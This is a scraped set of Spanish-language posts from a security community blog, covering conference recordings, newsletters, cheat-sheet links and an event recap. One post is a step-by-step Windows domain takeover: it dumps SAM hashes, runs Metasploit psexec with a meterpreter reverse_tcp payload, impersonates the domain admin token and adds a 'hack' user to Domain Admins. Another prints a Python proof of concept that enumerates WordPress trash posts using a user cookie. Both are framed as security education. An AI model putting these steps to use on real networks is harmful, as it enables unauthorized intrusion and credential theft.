Sin mas preámbulos, los dejos con las memorias del DISI 2009

Inauguración DISI 2009
D. José Manuel Perales, D. Ramón Capellades, D. César Sanz, D. Jorge Ramió

Duración: 07:28 minutos

Conferencia Inaugural. Hashing Aleatorio: Firmas Digitales Seguras sin Resistencia a Colisiones
D. Hugo Krawczyk, IBM Research – Estados Unidos

Duración: 01:10:19 horas, Las diapositivas puedes descargarlas de aquí.

Coloquio Tendencias en Malware
D. José Bidot Director de Segurmática Cuba, D. Ero Carrera Chief Research Officer Collaborative Security VirusTotal España y D. Emilio Castellote Director de Marketing de Panda Security España. Modera D. Justo Carracedo Catedrático de la EUITT-UPM

Duración: 01:20:50 horas, Puedes descargar diapositivas de D . José Bidot (aqui) y las Diapositivas de D . Ero Carrera (aqui).

Coloquio Mitos y Realidades en Hacking
D. Luis Guillermo Castañeda Director de Servicios Profesionales de Rusoft México, D. Chema Alonso Consultor de Seguridad de Informática64 España, D. Alejandro Ramos Manager de TigerTeam en SIA España y D. Rubén Santamarta Consultor Técnico Independiente España. Modera D. Daniel Calzada Profesor Titular de la EUI-UPM

Duración: 01:46:57 horas, Puedes descargar las Diapositivas de D . Luis Guillermo Castañeda (aquí), y las Diapositivas de D . Chema Alonso (aquí)

Clausura DISI 2009
D. Justo Carracedo, Dña. Gemma Déler, D. Jorge Ramió

Duración: 06:15 minutos

Si quieres descargar los vídeos de estas charlas puedes instalar el plugin para Mozilla Firefox Video DownloadHelper.

Para mas información visita la página oficial del evento, donde encontraras también las Ponencias del DISI 2006, las del DISI 2007. y las ponencias del DISI 2008.

También puede interesarte...

• Memorias del DISI 2008
• El futuro de la industria de la Seguridad Informática
• Kevin Mitnick – The Art Of Deception – Video Conferencia
• 1st Security Blogger Summit
• Video: Explotando WM Downloader
• ¿Dónde estudiar seguridad informática en Colombia?
• Vídeo: Introducción al Metasploit Framework
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)

Este libro reúne desde los conceptos más básicos a los más avanzados de la Seguridad Informática. En la segunda entrega se explican los diferentes protocolos que hacen posible la comunicación entre computadoras, el modelo OSI, el protocolo TCP/IP, ICMP, UDP y ARP con el que se finaliza realizando un laboratorio practico.

Descargar Capitulo 2 de “El Atacante Informático”

Capítulos Publicados:

• El Atacante Informático – Capitulo 1
• El Atacante Informático – Capítulo 2

Para Mas Información:
IT Forensic

También puede interesarte...

• La arquitectura de seguridad OSI
• Descarga Gratis el Libro de Una al Día
• (IN)SECURE Magazine Edición 21
• Cárcel y Multas para Delitos Informáticos en Colombia
• Libro: Redes Inalámbricas en los Países en Desarrollo
• Aspectos Avanzados de Seguridad en Redes
• Memorias del DISI 2009
• Boletín de La Comunidad DragonJAR #0008

SUMARIO

• Artículos Destacados.
• Resultados del Reto Forense de la Comunidad DragonJAR
• Confirmado el Primer Combat Training V2.0 en Colombia.
• Reglas de la Comunidad DragonJar.
• Noticias Destacadas.
• Documentación.
• Anuncios
• Consultas.
• Próximo Eventos.
• Boletines Anteriores.

ARTÍCULOS DESTACADOS

• Pastel, Cheet Sheets, Chuletas en la Seguridad Informática
• ¿Cómo Configurar la Privacidad en las Redes Sociales?
• Premio ESET 2010 al mejor trabajo de investigación en Seguridad Antivirus
• Antivirus Gratuito con Poco Consumo
• Instalando Snow Leopard en Vmware 7
• Analisis BASICO a un “archivo sospechoso” (malware)
• Metasploit — Explotando vulnerabilidad en Windows 7

RESULTADOS DEL RETO FORENSE DE LA COMUNIDAD DRAGONJAR

Con más de 1000 descargas de la imagen correspondiente al Primer Reto de Análisis Forense Digital de la Comunidad DragonJAR y luego de realizar la evaluación de los reportes entregados por los participantes, se publicaron los resultado de estas evaluaciones.Leer la nota completa

CONFIRMADO EL PRIMER COMBAT TRAINING V2.0 EN COLOMBIA

Es un placer para La Comunidad DragonJAR y Base 4 Security anunciar las fechas en las que se llevará a cabo el primer COMBAT Training realizado en Colombia, debido a la gran acogida que ha tenido esta capacitación en seguridad informática, decidimos realizarlo en 2 de las principales ciudades de nuestro país, Bogotá y Medellín, en las cuales se encuentran la mayoría de los pre-inscritos.Leer nota completa

REGLAS DE LA COMUNIDAD DRAGONJAR

Esta es una invitación para todos los miembros de la Comunidad Dragonjar, a revisar los términos y condiciones planteados como reglas de nuestra comunidad. Es importante recordarlas, sobre todo respetarlas y por su puesto cumplirlas. Recordemos que pertenecer a la comunidad implica estar de acuerdo con estas reglas. Leer las reglas de la comunidad…

NOTICIAS DESTACADAS

• SystemRescueCD, Recupera tus datos después de un fallo en el sistema
• Así fué el Technet Security Day de Microsoft en Barcelona
• Emulador de fallos en Discos Duros
• “Crean” un navegador pensando en su seguridad
• ¿Cómo tomar control de un Dominio en Windows?
• Pueden leer tu “Basura”
• Bits y Qubits, El camino de la criptografía – Parte II
• Bits y Qubits, El camino de la criptografía – Parte I
• Ciberterrorismo
• Creando una antena para redes WIFI
• Taxonomía de un Ataque con Backtrack 4
• Microsoft esta Regalando Hardware
• Limpiando metadatos de PDF, Open Office, Office e imágenes II
• Limpiando metadatos de PDF, Open Office, Office e imágenes I
• 20 Trucos para asegurar Apache
• [VB][C#] – Aplicacion de polinomio CRC16
• Explotando vulneravilidad en Internet Explorer 7
• Anonimizar linux mediante una vpn
• Explotando vulneravilidad en Firefox 3.5
• Compatibilidad de Hardware con Solaris y OpenSolaris
• Usar PowerPoint para hacer danios!
• Algunos Videos De las Bondades de OpenSolaris
• Como eliminar un virus del msn en 5 pasos
• Conseguir una invitación de Spotify gratis!!!
• Denegación de servicio en Cisco Firewall Services Module
• Un ataque informático infecta a unos 75.000 ordenadores de todo el mundo
• Google Buzz tenía un XSS (solucionado)
• Desenmascarando al Software Libre
• Un falso antivirus con soporte técnico
• Blue screen en xp luego de actualizacion ms10-015
• BUG IIS (El mismo de otro modo) XD
• Otro BUG IIS (El mismo de otro modo)
• Metasploit y como tirarse 5 controladores de dominio
• Verificar si una direccion de correo es valida (Class)
• [Metasploit] Bug Microsoft IIS
• Creando un USB booteable para instalar Windows 7
• Subir archivos sin importar el tamaño desde ASP.NET
• Como tener un portal ASP.NET en segundos
• Funciones para Manejo de una base de datos My SQL
• ¿Smishing?
• Lista con war games donde pratica

DOCUMENTACIÓN

• Recopilación de publicaciones y entornos de Sec-Track
• (IN)SECURE Magazine número 24, descarga disponible
• Sistema de coordenadas y representación de puntos [PHP / Ajax]
• Fast-Track <-> Accediendo a un sistemas con Fast-Track
• Documento de UML 2
• Manual Instalacion Thunderbird
• Simulador de Redes GNS3
• Tip: Crear una web multilenguaje
• Diseño Orientado a Objetos con UML
• Acceso a Datos con el Lenguaje SQL
• La Ley 1273 de 2009 “Delitos informáticos”
• [Manual] Buffer Overflow en Windows
• [GUIA KDE] particularidades de konqueror y Kate
• Explotando Bug de Win7 con Bt4
• Script para eliminar Cookies de Flash
• Pc World Febrero 2010
• LIbro Introducing .NET 4.0: with Visual Studio 2010
• Libro SQL Injection Attacks and Defense
• Mantenimiento de equipos informaticos
• Bits y Qubits: El Camino de la Criptografia
• WUDE 3.0 Final, Varios Host de descarga

ANUNCIOS

• Importante-Leer-Ezine DragonJAR
• Dragonautas de la Ciudad de Medellin Colombia
• Diplomado en Seguridad informatica – Cali
• Propuesta rangos
• Cursos Universidad Nacional

CONSULTAS

• Help programacion java (xml, servidor ..)
• Duda sobre red
• Problemas con nokia N73
• Automatizacion de Tareas
• Ayuda para obtener certificado digital
• Servidor Proxy Linux Ayuda
• Como eliminar virus de msn
• Ayuda con mozilla firefox e internet explorer
• Poseedor de Keylogger: victima o victimario
• Ayuda con incriptado
• Proteger particion
• Problemas con Airodump-ng
• Problema al instalar Windows Xp Profesional
• Excepciones para antivirus?

PRÓXIMOS EVENTOS

• Confirmado el COMBAT Training en Colombia
• X.25 Conferencia de Seguridad Informática en Mexico

BOLETINES ANTERIORES

• Boletín de La Comunidad DragonJAR #0007
• Boletín de La Comunidad DragonJAR #0006
• Boletín de La Comunidad DragonJAR #0005
• Boletín de La Comunidad DragonJAR #0004
• Boletín de La Comunidad DragonJAR #0003
• Boletín de La Comunidad DragonJAR #0002
• Boletín de La Comunidad DragonJAR #0001

También puede interesarte...

• Boletín de La Comunidad DragonJAR #0007
• Boletín de La Comunidad DragonJAR #0006
• Boletín de La Comunidad DragonJAR #0005
• Boletín de La Comunidad DragonJAR #0004
• Boletín de La Comunidad DragonJAR #0003
• Boletín de La Comunidad DragonJAR #0002
• Boletín de La Comunidad DragonJAR #0001
• La Comunidad DragonJAR en LemonTV.tv

Pero no importa si le llamas pastel, chancuco, (en colombia las mas utilizadas) o chuletas (muy común en españa) a ese trozo de papel, lápiz, piel, etc…, lo importante es la función que cumplen al “recordarnos” los aspectos claves de los temas que estamos tratando.

En el campo de la seguridad informática es normal contar con mas de una docena de herramientas y técnicas para realizar un test de penetración o testear la seguridad de un  aplicativo o red, es por eso que en este campo, en el que tenemos que recordar tantas cosas, son especialmente útiles estas “ayudas didácticas”, en este articulo pretendo recopilar el mayor numero de “chuletas” o “cheet sheets” de herramientas y técnicas relacionadas con la seguridad informática.

Técnicas:

XSS

• XSS Cheet Sheets
• Hoja de trucos XSS
• XSS – Exposed
• XSS, SQL Injection and Fuzzing Barcode Cheat Sheet
• Prevención del XSS
• xssDB

SQL Injection

• SQL Injection Cheat Sheet
• Informix SQL Injection Cheat Sheet
• MSSQL Injection Cheat Sheet
• Oracle SQL Injection Cheat Sheet
• MySQL SQL Injection Cheat Sheet
• Postgres SQL Injection Cheat Sheet
• DB2 SQL Injection Cheat Sheet
• Ingres SQL Injection Cheat Sheet
• SQL Injection Prevention Cheat Sheet

Search Engines Hacking

• Google Hacking
• Bing Hacking (I de III)
• Google Hacking Database

Cross-Site Request Forgery

• Cross-Site Request Forgery (CSRF) Prevention

Ingeniería Inversa

• X86 Win32 Reverse Engineering

Análisis Forense

• Análisis Forense Digital

Wireless Crack

• Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
• WEP Cracking – Cheat Sheet

Herramientas

• Hping (español) (ingles)
• NMap (español) (ingles)
• Fgdump, Hping, Metasploit (ingles)
• Netcat (ingles)
• ESAPI (ingles)
• BackTrack 4 (ingles)

Procedimientos / Protocolos

• Intrusion Discovery Cheat Sheet (Linux) (Windows)
• IPv6 TCP/IP and tcpdump
• TCP/IP and tcpdump
• OWASP 2010 Top 10 Cheat Sheet
• Web Application Security Frame

Ayudanos a complementar este listado, enviamos las “chuletas”, “Pasteles”, “Cheat Sheets” (o como le llamen en tu pais), que conozcas sobre herramientas, técnicas o temas relacionados con la seguridad informática.

También puede interesarte...

• X.25 Conferencia de Seguridad Informática en Mexico
• Ciberterrorismo
• ¿Dónde estudiar seguridad informática en Colombia?
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• ¿Es suficiente la seguridad lógica en entornos de alta seguridad?
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• PentBox – Una suite de seguridad y pentesting en ruby
• Varias Distribuciones Live CD de Seguridad en un DVD

En el inicio de las charlas, nos “asustaron”, dando a conocer las principales amenazas y ataques que se pueden sufrir en un entorno de trabajo remoto así como las contramedidas a implementar para evitarlas.

Después de acabar con la presentación del evento le tocó el turno al “maestre” a Chema Alonso de Informática 64, que nos mostró las ventajas de trabajar desde casa y explicó, por que es importante el uso de las VPN’s cuando realizamos este tipo de trabajos.

Las temáticas, tecnologías y demos que se mostraron en la charla fueron:

• PPP,PPTP, L2TP/IP, L2TP/IPSec
• Sistemas de autenticación
• Demo: Ataque MITM a una conexión PPTP
• Conexiones SSTP

Cuando terminó su explicación, le dió paso a un compañero que se encargo de explicar la tecnología Forefront Threat Management Gateway con la cual creamos entornos seguros para compartir información.

Las temáticas, tecnologías y demos que se mostraron en la charla fueron:

• Demo: Montaje de una conexión SSTP con Forefront TMG
• Redes VPN de cuarentena
• Demo: Montaje de una red de cuarentena
• Forefront Unified Application Gateway
• PN-SS
• Publicación de aplicaciones
• End-point security
• Demo: Montaje de una conexión VPN-SSL compliant
• Direct Access
• Seguridad y privacidad en IPv6
• Demo: Montaje de Direct Access con Windows 7/ Windows Server 2008 R2

Después de este último apartado hicimos un descanso para desayunar del cual ni hay fotos, estaba ocupado intentado coger algún Croisant!.

Cuando volvimos del periodo descanso, tocó una charla que me gusta mucho, ya que, ya la había visto y me parecía muy interesante.

El turno ahora era el Maligno, Chema Alonso (de nuevo), nos explico por que es el correo electrónico puede ser un foco de problemas de seguridad y las razones por las cuales debemos protegerlo.

Las temáticas, tecnologías y demos que se mostraron en la charla fueron:

• Firma digital S/Mime
• Identidad y Spam
• Soluciones “Short Temp”
• Sender ID y SPF
• Demo: Enviando correos falsos
• MS Forefront Threat Management Gateway
• Protección de los servicios de correo
• Anti-spam en el perímetro
• Filtrado de conexiones
• Filtros de reputación
• Filtros Sender ID

Cuando acabó su turno, otro compañero que se encargó de dar la charla sobre Anti-malware en el perímetro y los peligros de este a la hora de compartir y gestionar documentos.

Las temáticas, tecnologías y demos que se mostraron en la charla fueron:

• Demo: Filtrado de correo con troyanos bancarios en MS Forefront TMG
• MS Forefront Protection for Exchange 2010
• Motores Anti-malware
• Filtrado de spam, malware & gusanos
• Política de comunicaciones
• Demo: Filtrando el malware en el correo electrónico
• MS Forefront Protection Manager Console 2010
• Demo: Configurando alertas de seguridad globales
• Correo seguro con MS Forefront para la nube
• Microsoft Forefront Online Protection for Exchange

Cuando otro de los maestros como es Juan Luís terminó de dar su parte de charla pasamos a otra de las charlas interesantes como es:

Las temáticas, tecnologías y demos que se mostraron en la charla fueron:

• Malware en ficheros ofimáticos
• Evolución
• Demo: Un troyano en un memorándum //Esta le tocó otra vez a Chema he hizo una demo combinando el Netcat y un troyano en el PDF
• Gestión corporativa
• Antimalware & Antispyware
• Demo: Filtrado de troyanos
• Demo: Gestión de alertas
• Demo: Informes de seguridad

Y ya para la última charla la implementación de MS Forefront Protection para SharePoint 2010 donde las temáticas, tecnologías y demos que se mostraron en la charla fueron:

• Detección de malware en repositorios documentales
• Demo: Scaneo multimotor de documentos ofimáticos
• Forzado de medidas de seguridad en el cliente
• MS Forefront Unified Access Gateway 2010
• Demo: Políticas de acceso a la red

Con esto damos por finalizado el TechNet del Security Day en Barcelona.

Merece la pena ir a estos eventos ya que además de ser gratuitos, en medio de las charlas técnicas tienes oportunidades de echar unas risas con cosas como esta:

Esta foto es debida a un vídeo que Chema Alonso puso en el que explicaba que en una comunicación es bueno conocer a la otra persona.. No queráis saber como acaba el vídeo por que NO os lo imagináis.

AH! Y se me olvidaba, antes de irme pude recibir como regalo este libro

Las diapositivas nos las quedaron debiendo, tan pronto las envíen las publicamos en la comunidad.

También puede interesarte...

• Instalando Varios Sistemas Operativos en un Acer One – Parte I
• Actualiza tu equipo con Windows
• Descargar Gratis Internet Explorer 8 Final
• Webcast de Microsoft sobre Seguridad Informática
• Guía de Seguridad de Windows Vista
• Guia de Seguridad de Windows Server 2003
• Memorias del DISI 2009
• El Atacante Informático – Capítulo 2

En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

• Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
• Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
• Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
• Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

• mount /dev/sda1 /mnt/sda1
  Montamos la particion de la maquina windows
• cd /mnt/sda1/WINDOWS/system32/config
  accedemos a la carpeta dodne se encuentra el archivo SAM
• samdump2 system SAM
  sacamos los hash de los usuarios en la maquina windows
• msfconsole
  ejecutamos el metasploit por consola
• use windows/smb/psexec
  utilizamos el psexec
• exploit -p windows/meterpreter/reverse_tcp -o
  utilizamos la shell meterpreter
• LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
  configuramos las opciones del exploit
• sessions -i 1
  una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
• use incognito
  utilizamos el modulo incognito de meterpreter
• list_tokens -u
  mostramos los tokens
• impersonate_token mydomain\\domainadmin
  tomamos las credenciales del administrador de dominio
• execute -f cmd.exe -i -t
  lanzamos la consola de windows
• net user hack MPass5678 /add /domain
  Agregamos el usuario “hack” con clave “MPass46782″ al dominio
• net group “Domain Admins” hack /add /domain
  metemos el usuario hack al grupo de administradores de dominio
• Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.

También puede interesarte...

• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Como realizar un borrado seguro usando BleachBit
• Video: Explotando WM Downloader
• Como Recuperar Clave MySQL
• Vídeo: Introducción al Metasploit Framework
• Metasploit Framework 3.3.2

Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada “papelera“, con la cual todos los artículos, comentarios o páginas “borradas” pasarían a la “papelera de reciclaje” para prevenir así que sean eliminados de forma accidental.

Lo que descubrió Thomas Mackenzie es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la “papelera”, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos… cosa que Mackenzie pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra “papelera”.

#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
# If the requests differ a ‘Trash’ post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = “www.example.com”
userCookie = “enter_cookie_here”
postID = 0 #Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {“Cookie” : userCookie}

print
print “Target = http://” + blogURL + “/?p=” + str(postID)
print

while 1:

# Start non authenticated enumeration

request = ‘/?p=’ + str(postID)
conn.request(“GET”, request, “”)

try:
r1 = conn.getresponse()
except:
print “Connection error”

data1 = r1.read()

# Start authenticated enumeration

conn.request(“GET”, request, None, Headers)

try:
r2 = conn.getresponse()
except:
print “Connection error”

data2 = r2.read()

# Compare the HTML body reponses

if data1 != data2:
print “+ Found! http://” + blogURL + request
else:
print request

postID += 1

conn.close()

Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que actualicen su instalación de WordPress a la versión 2.9.2 que ya cuenta con un parche para este problema de seguridad.

Una vez más queda confirmado que la seguridad por “oscuridad”  no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.

PD. Lo que no entiendo es por que páginas como DaboWeb y Mangas Verdes hablan de este fallo y afirman que un posible atacante puede “Eliminar artículos de nuestro WordPress” ¿De donde habrán sacado esa informacion?…

También puede interesarte...

• Como realizar un borrado seguro usando BleachBit
• Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5
• Denegacion de Servicio en WordPress
• Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Memorias del DISI 2009
• El Atacante Informático – Capítulo 2
• Boletín de La Comunidad DragonJAR #0008

Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del 22 al 23 de Octubre del 2010 en Xalapa,  México.

Mas Información:
Pagina Oficial del Evento

También puede interesarte...

• Seminario de Seguridad Informática SecurInf v2.0 – Popayán
• Pastel, Cheet Sheets, Chuletas en la Seguridad Informática
• Ciberterrorismo
• ¿Dónde estudiar seguridad informática en Colombia?
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• ¿Es suficiente la seguridad lógica en entornos de alta seguridad?
• Videos de las Jornadas de Seguridad Informatica ArCERT
• 2do Congreso Nacional de Hacking Ético (Bogotá, Colombia)

También puede interesarte...

• Ciber Guerrillas – Documental sobre las Guerras Cibernéticas
• Pastel, Cheet Sheets, Chuletas en la Seguridad Informática
• X.25 Conferencia de Seguridad Informática en Mexico
• ¿Dónde estudiar seguridad informática en Colombia?
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• ¿Es suficiente la seguridad lógica en entornos de alta seguridad?
• Tercer Encuentro Internacional de Seguridad Informática – Día I
• Katana – Múltiples Distribuciones de Seguridad en tu USB

SUMARIO

• Artículos Destacados.
• Nuestros Propósitos para el 2010
• La Comunidad Dragonjar en la EKOParty 2010
• Noticias Destacadas.
• Documentación.
• Anuncios
• Consultas.
• Próximo Eventos
• Boletines Anteriores

ARTÍCULOS DESTACADOS

• [Metasploit + 0-day IE] Exploit IE_Aurora
• Ataque/Intrusion Automatizado
• Configuración De-ICE PenTest LiveCDs (Nivel II) en VMWare
• Desarrollo del Entorno De-Ice nivel II – Network Mapping, Port Scanning
• Configuración De-ICE PenTest LiveCDs (Nivel II) en VMWare
• Curso: Sistemas de gestión de la seguridad de la información Bajo Norma ISO 27001
• Antivirus NOD32 para sistemas GNU/Linux
• Los 10 Mandamientos del Password

NUESTROS PROPÓSITOS PARA EL 2010.

Después de realizar lo mejor del 2009 igual que el año pasado, este año también realizaremos nuestros propósitos para el 2010, en esta ocasión y como es la segunda vez, vamos a enumerar nuestros propósitos pasados para ver cuantos de ellos cumplimos y cuales no cumplimos. Leer el resto del articulo

LA COMUNIDAD DRAGONJAR EN LA EKOParty 2010

La Comunidad DragonJAR formara parte de los supporting association de la EKOParty y algunos integrantes de nuestra comunidad, asistiremos a uno de los mejores eventos de seguridad informática en todo latinoamerica, la idea de este post es proporcionar la informacion relacionada con nuestro viaje, así como organizar esfuerzos para que todo salga bien en este nuevo proyecto. Leer información completa..

NOTICIAS DESTACADAS

• Como realizar un borrado seguro usando BleachBit
• Video: Explotando WM Downloader
• ¿Dónde estudiar seguridad informática en Colombia?
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Como Recuperar Clave MySQL
• La arquitectura de seguridad OSI
• Vulnerabilidad 0-day en todas las versiones de Windows
• Vídeo: Introducción al Metasploit Framework
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)
• Como detectar y prevenir escalada de privilegios en GNU/Linux
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• Aplicaciones Web Vulnerables
• Clonacion de tarjeta Sim y hacking a telefonos publicos
• Extensiones de Firefox para Auditorias de Seguridad
• Backtrack 4 Final
• Top 10 Técnicas de Seguridad Web en el 2009
• CeWL – Generador de Diccionarios Personalizados
• Distribuciones que Garantizan nuestra Privacidad
• Tests -revisar si nuestro sistema operativo tiene alguna vulnerabilidad
• Zimuse, un gusano que afecta al sector de arranque de los PCs
• Falsa alerta de virus se distribuye masivamente entre los usuarios de Facebook
• Defensio 2.0, protección gratuita para tu cuenta de FaceBook, WordPress O Drupal
• Mp4 (Soluciones Simples xD)
• [Fast-Track + Metasploit] Autopwn Automation
• [Metasploit] Infectando Linux con Troyano
• Crakear Wep con WifiSlax
• Procedimiento, Cuando un Xss se Vuelve Crítico
• Investigador publica vídeo demostrativo sobre Ataque de ClickJacking en Facebook
• Auditoría Wireless con Wisacom WS-HP 800 en Ubuntu 9.10 Ataque Chop Chop
• [Metasploit] Java Applet Infection
• HTTPS NO te salvara en Gmail
• Captura de clave VNC por fuerza bruta, usando MITM.
• Robo de claves con SSL
• Tunel inverso con SSH detras de un NAT
• Robar session de SSH usando PUTTY
• Extensiones de Thunderbird (I) EnigMail
• Haz-te una copia de tus cuentas online
• Keylogger web con Javascript y PHP
• Certifícate y aprende y…de manera gratuíta!
• SQL Injection Avanzado
• Verificar si una direccion de correo es valida
• Mapeo de redes con lanmap
• La caza del hacker
• El “archivo” de Internet
• Pasar Resultado de escaneo de Nmap al MSF
• ¿ Has perdido tu portátil ?, Prey es la solución!
• ReactOS ¿ alternativa Open Source a Windows XP ?

También puede interesarte...

• Boletín de La Comunidad DragonJAR #0008
• Boletín de La Comunidad DragonJAR #0006
• Boletín de La Comunidad DragonJAR #0005
• Boletín de La Comunidad DragonJAR #0004
• Boletín de La Comunidad DragonJAR #0003
• Boletín de La Comunidad DragonJAR #0002
• Boletín de La Comunidad DragonJAR #0001
• La Comunidad DragonJAR en LemonTV.tv